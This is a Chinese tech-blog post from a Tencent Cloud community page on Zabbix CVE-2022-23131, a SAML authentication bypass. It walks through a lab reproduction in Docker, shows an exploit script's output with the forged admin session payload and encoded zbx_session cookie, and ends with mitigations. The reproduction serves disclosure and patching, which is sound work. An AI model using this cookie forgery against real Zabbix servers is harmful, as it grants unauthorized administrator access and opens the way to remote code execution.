Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >zabbix最新漏洞,可绕过认证登陆!

zabbix最新漏洞,可绕过认证登陆!

原创
作者头像
运维朱工
修改于 2022-08-28 04:16:53
修改于 2022-08-28 04:16:53
1.2K0
举报
文章被收录于专栏:云计算教程云计算教程

漏洞概述

漏洞编号:CVE-2022-23131

漏洞威胁等级:高危

Zabbix是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。

Zabbix对客户端提交的Cookie会话存在不安全的存储方式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE

影响范围

Zabbix Web前端版本包括

  • 5.4.0-5.4.8
  • 6.0.0alpha1

复现

虽然官方给是zabbix版本在5.4.0-5.4.8这个区间受影响,但是我在zabbix 5.4.11也同样复现了这个问题。

代码语言:shell
AI代码解释
复制
# 快速构建zabbix环境
]# docker run  --rm -d -P lutixiaya/zabbix-cve_2022_23131:latest
~]# docker ps
CONTAINER ID   IMAGE                                    COMMAND                  CREATED         STATUS         PORTS                                     NAMES
158e737a3794   lutixiaya/zabbix-cve_2022_23131:latest   "/bin/sh -c 'bash /r…"   3 seconds ago   Up 2 seconds   0.0.0.0:49153->80/tcp, :::49153->80/tcp   competent_diffie

可以看到启用了SAML认证方式,这时直接点击该认证是无法登陆的,但是通过修改cookie可以跳过认证。

image.png
image.png

修改cookie

代码语言:shell
AI代码解释
复制
~]#  python CVE-2022-23131.py http://ip:49153/   
未加密Payload:{"saml_data":{"username_attribute":"Admin"},"sessionid":"99c65fd664e1e0bb929d8a9d964f0a98","sign":"2cd21893210753d4d2926aa08fe7ebefdd41a8ab6413bb551ce048848b1dda44"}


加密后Payload:eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiOTljNjVmZDY2NGUxZTBiYjkyOWQ4YTlkOTY0ZjBhOTgiLCJzaWduIjoiMmNkMjE4OTMyMTA3NTNkNGQyOTI2YWEwOGZlN2ViZWZkZDQxYThhYjY0MTNiYjU1MWNlMDQ4ODQ4YjFkZGE0NCJ9
                                   

复制上面加密后Payload,修改zbx_session(在浏览器按F12,打开开发者工具)的值。

image.png
image.png

修改完成之后,再次点击SAML,可直接跳过认证登陆!

image.png
image.png
image.png
image.png

修复建议

临时方案:禁用 SAML 身份验证

推荐方案升级安全版本

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
云原生数据库 TDSQL-C 高可用,一键实现多可用区部署
随着云计算和大数据技术的飞速发展,云原生数据库逐渐成为企业 IT 架构的新趋势。腾讯云作为国内领先的云服务提供商,一直致力于云原生技术的研发和创新。今天,我们将为大家深度解析腾讯云原生数据库 TDSQL-C 的预置资源和 Serverless 两种实例形态,以及多可用区部署的特性,探讨多可用区部署背后的技术原理和应用场景。
腾讯云数据库 TencentDB
2024/05/31
3130
云原生数据库 TDSQL-C 高可用,一键实现多可用区部署
持续突破创新,云原生数据库TDSQL-C实现 “为云而生”
2021年5月20日~22日,第十三届中国系统架构师大会(SACC2021)以云端会议直播的形式顺利召开。来自腾讯云的数据库专家工程师尚博,云原生数据库计算层负责人,在云架构最佳实践专场,做了《腾讯云原生数据库架构探索与实践》的主题分享。
腾讯 架构师
2021/05/31
1K0
再获认可!腾讯云TDSQL斩获可信云技术最佳实践奖
7月28日,由中国信息通信研究院、中国通信标准化协会联合主办的“2021可信云大会”上,腾讯云原生数据库TDSQL-C 凭借100%兼容 MySQL 和 PostgreSQL、实现超百万级QPS的高吞吐、128TB海量分布式智能存储、保障数据安全可靠等优势,在云原生数据库领域斩获2020-2021年度可信云技术最佳实践案例奖。 该奖项由中国信息通信研究院、中国通信标准化协会联合颁发,对申报单位提交的产品技术创新、技术的性能应用及云产品的解决方案等进行全面考核,包括技术专业性、技术能力和服务水平等多维度指标
腾讯云数据库 TencentDB
2021/07/29
5730
云原生数据库TDSQL-C PostgreSQL版内核解密
导语 TDSQL-C 原(CynosDB)是腾讯云数据库团队自研的新一代云原生数据库,融合了传统数据库、云计算与新硬件技术的优势,采用计算和存储分离的架构,100%兼容 PostgreSQL,提供具备极致弹性、高性能、海量存储、安全可靠的数据库服务。 本文旨在从数据库内核的角度揭秘TDSQL-C PostgreSQL的核心架构与关键技术。本文适合读者:腾讯云售后服务、TDSQL-C用户、TDSQL-C开发者,需要有基本的数据库与存储知识。 TDSQL-C 概述 TDSQL-C采用计算和存储分离的架构
腾讯云数据库 TencentDB
2021/09/26
2.1K0
又拿奖了!腾讯云原生数据库TDSQL-C斩获2021PostgreSQL中国最佳数据库产品奖
日前,开源技术盛会PostgresConf.CN & PGconf.Asia2021大会(简称2021 PG亚洲大会)在线上隆重召开,腾讯云作为业内领先的云数据库服务商受邀出席,多位专家深入数据库生态、云原生架构、新硬件、智能化等领域进行分享,详细解读了腾讯云数据库在Oracle兼容、高效和智能运维、数据迁移、内核优化等方面的技术实践。 在2021年度PostgreSQL中国技术评选发布仪式上,经由组委会专家严格评审,腾讯云数据库被评为“2021PostgreSQL中国最佳服务商”,同时腾讯云原生数据库
腾讯云数据库 TencentDB
2021/12/20
1.1K0
腾讯云数据库TDSQL——博客数据库迁移实践
之所以写这篇文章,还是正好有刚需,我的博客数据库需要迁移使用TDSQ-C的产品,为了提升我博客速度,还是花重金去买了腾讯云数据库TDSQL的产品。
Lansonli
2022/04/24
5.2K1
腾讯云数据库TDSQL——博客数据库迁移实践
云原生数据库TDSQL-C——云上应用研发方式的改变
文章出处: 鹅厂架构师 2021年6月26日,腾讯云【TECHO】HUB技术巡回长沙站顺利开展,聚焦于数字媒体行业的云端实践。会上,腾讯云数据库高级工程师窦贤明重点分享了《腾讯云云原生数据库TDSQL-C——云上应用研发方式的改变》。由此,我们一起来看传统主备方式数据库与云原生数据库的对比演进。 (传统的读写分离) 传统数据库主备方式: 存储各自独立 主备间通过数据流复制保证数据一致,主库故障则切换到备库 可用性与可靠性无法兼顾 (云原生数据库计算存储分离) 腾讯自研云原生数据库 TDSQL
腾讯数据库技术
2021/07/12
1.7K0
【腾讯云TDSQL-C Serverless 产品测评】大数据时代是谁在国产数据库中开荒?
“腾讯云TDSQL-C产品测评活动”是由腾讯云联合CSDN推出的针对数据库产品测评及产品体验活动,本次活动主要面向TDSQL-C Serverless版;
用户10842419
2023/11/15
3530
【腾讯云TDSQL-C Serverless 产品测评】大数据时代是谁在国产数据库中开荒?
容灾系列(五)——数据库容灾建设
在一个数据为王时代,数据安全视为一家企业命根子,因此如何保障企业数据安全尤为重要。本文主要从数据库容灾方案视角,基于当前客户业务并结合技术&产品,制定最佳容灾方案。主要从以下三个方面来介绍:
开元
2021/10/21
8.6K2
容灾系列(五)——数据库容灾建设
腾讯分布式数据库TDSQL金融级能力的架构原理解读
为帮助开发者更好地了解和学习分布式数据库技术,2020年3月,腾讯云数据库、云加社区联合腾讯TEG数据库工作组特推出为期3个月的国产数据库专题线上技术沙龙《你想了解的国产数据库秘密,都在这!》,邀请数十位鹅厂资深数据库专家每周二和周四晚上在线深入解读TDSQL、CynosDB/CDB、TBase三款鹅厂自研数据库的核心架构、技术实现原理和最佳实践等。三月为TDSQL专题月,本文将带来直播回顾第一篇《腾讯自研分布式数据库TDSQL核心架构及特性拆解》。
分布式数据库TDSQL
2020/03/18
6.8K0
腾讯分布式数据库TDSQL金融级能力的架构原理解读
SIGMOD 2021 | 业务驱动背景下,腾讯云原生数据库TDSQL-C的技术演变之路
6月20-25日,数据库国际顶会2021 ACM SIGMOD在西安举行。本届大会上,腾讯云数据库技术总监邱敏带来了主题为“腾讯云数据库技术演变之路”的演讲。 演讲视频 以下为演讲内容的文字实录: 数据库是三大基础软件之一。近年来,腾讯也在不断加强各类数据库产品的研发投入。企业级分布式数据库TDSQL是腾讯云数据库的代表性产品,同时具备OLTP、OLAP,以及混合OLTP和OLAP的HTAP能力。它包括以下几个系列的产品: 企业级MySQL即腾讯云数据库RDS系统(CDB),相对原生MySQL进行
腾讯云数据库 TencentDB
2021/07/12
8700
TDSQL-C PostgreSQL(CynosDB) 内核解密-披荆斩棘,勇往直前的腾讯云数据库
TDSQL-C采用计算和存储分离的架构,所有计算节点共享一份数据,存储容量高达128TB,单库最高可扩展至16节点,提供秒级的配置升降级、秒级的故障恢复和数据备份容灾服务。TDSQL-C既融合了商业数据库稳定可靠、高性能、可扩展的特征,又具有开源云数据库简单开放、自我迭代的优势。TDSQL-C不仅在性能、扩展性和高可用方面有大幅提升,计算存储的解耦使得计算层和存储层都获得了很大的独立优化空间,本文下面将介绍TDSQL-C架构的实现,以及在新架构上的关键技术优势。
腾讯云数据库 TencentDB
2021/09/17
1K0
「TEG+系列」破局者 - 腾讯金融级数据库TDSQL
一 背景 金融行业的数据库市场,尤其是银行的核心交易系统,一直是Oracle、DB2这类传统商业数据库的天下,但是: 2014年,微众银行选用TDSQL作为其核心交易系统的数据库解决方案; 2015年,腾讯金融云正式推出TDSQL数据库解决方案,在公有云以及私有云上投入商用,覆盖包括银行、保险、互联网金融、物联网等多个行业领域。 这标志着TDSQL已经开始进入这个领域,虽然目前,金融、传统行业的核心数据库依然是Oracle、DB2们占主导,但是TDSQL对外开放仅两年,已经为40个金融政企机构提供数
TEG云端专业号
2018/03/13
1.7K0
「TEG+系列」破局者 - 腾讯金融级数据库TDSQL
腾讯TDSQL:带你认识真正的金融级自主可控分布式数据库
在数字化时代,作为基础软件,数据库的自主可控对于企业的数据安全、业务稳定具有重要意义。只有实现“自主可控”才能从根本上保证信息安全,尤其是涉及重大安全的政府和金融领域,对数据安全的要求进一步加强。因此,在互联网安全上升至国家战略层面的背景下,如何在底层基础数据库层面实现自主可控成为云计算厂商不断追求的目标。
腾讯云数据库 TencentDB
2019/03/26
4.5K1
腾讯TDSQL:带你认识真正的金融级自主可控分布式数据库
【腾讯云 TDSQL-C Serverless 产品体验】饮水机式使用云数据库
TDSQL-C 是腾讯云自研的新一代云原生关系型数据库。融合了传统数据库、云计算与新硬件技术的优势,100%兼容 MySQL,为用户提供极致弹性、高性能、高可用、高可靠、安全的数据库服务。实现超百万 QPS 的高吞吐、PB 级海量分布式智能存储、Serverless 秒级伸缩,助力企业加速完成数字化转型。
用户10841220
2023/11/14
14.1K1
【腾讯云 TDSQL-C Serverless 产品体验】饮水机式使用云数据库
云原生数据库TDSQL-C关键技术内核解密
随着万千企业数字化转型提速,对云计算的使用效能提出新的需求。云原生以其独特的技术特点,正在成为驱动云计算“质变”的技术内核,腾讯云在云原生数据库领域进行了全方位技术创新和应用实践,本文将分别从海量存储、弹性缩扩容、秒级快速备份与回档和支持serverless4个维度分享腾讯云原生数据库TDSQL-C的显著特性,以及在不同业务应用场景中的内核技术优化实践。 传统数据库架构瓶颈 在自研云原生数据库TDSQL-C之前,我们也做多年其他的云数据库产品,越到后面越发现传统数据架构存在着几方面问题: 1.数据本地存储
腾讯云数据库 TencentDB
2021/11/25
1.1K0
浅析腾讯云数据库高可用特性 | 云原生篇
腾讯云原生数据库 TDSQL-C(Cloud Native Database TDSQL-C,TDSQL-C)是腾讯云自研的新一代高性能高可用的企业级分布式云数据库。融合了传统数据库、云计算与新硬件技术的优势,100%兼容 MySQL 和 PostgreSQL,实现超百万级 QPS 的高吞吐,128TB 海量分布式智能存储,保障数据安全可靠。 本文由腾讯云数据库高级工程师唐颋为大家详细解读TDSQL-C PostreSQL的高可用特性。 TDSQL-C PG版产品简介 TDSQL-C PG版是一款基于计算、
腾讯云数据库 TencentDB
2022/03/17
1.8K0
解密Midas、Webank、金融云背后的核心数据库TDSQL【海量服务之道2.0】
如果,你在寻找一款数据库,希望: •在任何情况下,数据都不丢失或错乱; •能7*24小时不间断的对外提供服务,即使故障也不会中断; •能支撑业务量10倍以上的弹性伸缩,不用担心会被压垮; •能快速响应请求,为用户提供最爽的体验; •没学习门槛,能快速上手; •便宜,少花点钱; 那么,TDSQL就是你的菜! TDSQL(Tencent Distributed mySQL-腾讯分布式MySQL)是由腾讯技术工程事业群计费平台部针对金融联机交易场景开发的高一致性数据库集群产品。其底层基于MySQL,针对金融OLT
腾讯大讲堂
2018/02/12
1.2K0
解密Midas、Webank、金融云背后的核心数据库TDSQL【海量服务之道2.0】
腾讯云原生数据库TDSQL-C跨地域备份功能,一招提升可用性和可靠性
互联网科技不断发展的同时,云端服务也变得越来越重要,云服务可以将企业所需的数据和软硬件都存放在网络上,在任何时间和地点使用不同的设备互连,就能实现数据的存取和运算,而我们的生活方方面面都在不断产生着数据,无论是出行记录、消费记录、浏览记录还是发送的消息。
腾讯云数据库 TencentDB
2024/01/09
2840
腾讯云原生数据库TDSQL-C跨地域备份功能,一招提升可用性和可靠性
​企业云上数据库服务选型及规划:基于腾讯云产品的深度分析
在数字化转型浪潮中,数据库作为企业核心数据资产的管理平台,其云化转型已成为必然趋势。腾讯云作为国内领先的云服务提供商,其数据库产品矩阵覆盖了从关系型到非关系型、从OLTP到OLAP的各类场景,能够满足企业多样化的数据管理需求。本文将系统性地分析企业在腾讯云上进行数据库服务选型与规划的方法论,从需求分析、产品选型、架构设计到实施路径,为企业提供一套完整的云数据库迁移与建设指南。
徐关山
2025/06/29
950
推荐阅读
云原生数据库 TDSQL-C 高可用,一键实现多可用区部署
3130
持续突破创新,云原生数据库TDSQL-C实现 “为云而生”
1K0
再获认可!腾讯云TDSQL斩获可信云技术最佳实践奖
5730
云原生数据库TDSQL-C PostgreSQL版内核解密
2.1K0
又拿奖了!腾讯云原生数据库TDSQL-C斩获2021PostgreSQL中国最佳数据库产品奖
1.1K0
腾讯云数据库TDSQL——博客数据库迁移实践
5.2K1
云原生数据库TDSQL-C——云上应用研发方式的改变
1.7K0
【腾讯云TDSQL-C Serverless 产品测评】大数据时代是谁在国产数据库中开荒?
3530
容灾系列(五)——数据库容灾建设
8.6K2
腾讯分布式数据库TDSQL金融级能力的架构原理解读
6.8K0
SIGMOD 2021 | 业务驱动背景下,腾讯云原生数据库TDSQL-C的技术演变之路
8700
TDSQL-C PostgreSQL(CynosDB) 内核解密-披荆斩棘,勇往直前的腾讯云数据库
1K0
「TEG+系列」破局者 - 腾讯金融级数据库TDSQL
1.7K0
腾讯TDSQL:带你认识真正的金融级自主可控分布式数据库
4.5K1
【腾讯云 TDSQL-C Serverless 产品体验】饮水机式使用云数据库
14.1K1
云原生数据库TDSQL-C关键技术内核解密
1.1K0
浅析腾讯云数据库高可用特性 | 云原生篇
1.8K0
解密Midas、Webank、金融云背后的核心数据库TDSQL【海量服务之道2.0】
1.2K0
腾讯云原生数据库TDSQL-C跨地域备份功能,一招提升可用性和可靠性
2840
​企业云上数据库服务选型及规划:基于腾讯云产品的深度分析
950
相关推荐
云原生数据库 TDSQL-C 高可用,一键实现多可用区部署
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档